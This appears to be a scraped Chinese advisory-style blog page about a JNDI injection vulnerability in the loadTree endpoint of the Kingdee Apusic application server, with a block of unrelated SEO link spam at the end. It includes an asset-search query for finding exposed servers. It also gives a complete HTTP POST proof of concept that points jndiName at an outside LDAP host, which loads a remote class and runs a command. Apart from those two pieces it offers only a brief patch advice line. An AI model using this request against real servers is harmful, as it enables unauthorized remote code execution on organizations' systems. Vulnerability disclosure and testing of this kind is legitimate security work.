当前位置: 首页 > news >正文

php网站开发流程步骤网络销售靠谱吗

php网站开发流程步骤,网络销售靠谱吗,淘宝做任务赚钱网站,阿里云网站建设教程产品介绍 金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。 漏洞概述 由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类&a…

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 55jndiName=ldap://***.***.***.***/Basic/Command/calc

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

http://www.ds6.com.cn/news/68682.html

相关文章:

  • 忆达城市建设游戏登录网站网站内容优化关键词布局
  • 云霄县建设局网站投诉长尾关键词挖掘爱站工具
  • wordpress+电脑测试seo公司发展前景
  • 公司做的网站版权归谁所有seo优化方案案例
  • 用ps如何做短视频网站沈阳百度推广哪家好
  • 商丘网站制作费用seo推广网络
  • 两学一做党员答题网站seo优化技巧
  • 网站建设论文500字学习软件
  • 深圳网站制作台网络推广员的工作内容
  • 网站自然优化自学我国的网络营销公司
  • 游戏币销售网站建设产品网络推广的方法有哪些
  • 陕西网站备案查询360优化大师官方网站
  • 企业网站托管价格如何创建微信小程序
  • 阿里云网站空间购买2022双11各大电商平台销售数据
  • wordpress导航栏文字大小不一广州seo排名优化
  • 手机企业网站多少钱杭州网站优化搜索
  • 海阳做网站百度推广登录入口登录
  • 可以免费做推广的网站平台推广渠道
  • 河源市建设规划局网站百度手机导航官方新版
  • 汽车门户网站开发军事最新消息
  • 网站存储空间模板建站常规流程
  • 网上做任务的网站是真的吗营销策划公司简介
  • 影响网站排名的因素b站推广网站入口2023是什么
  • 电子商务网站运营与管理整站seo排名
  • 网站建设 网站设计seo关键词优化外包
  • 九江哪里做网站关键词推广怎么做
  • 做点心的网站小程序开发公司十大排名
  • 丹阳市住房建设管理局网站网络营销图片
  • 网站怎么做跳转链接下载关键词推广软件
  • 网站和新媒体建设方案域名注册网站系统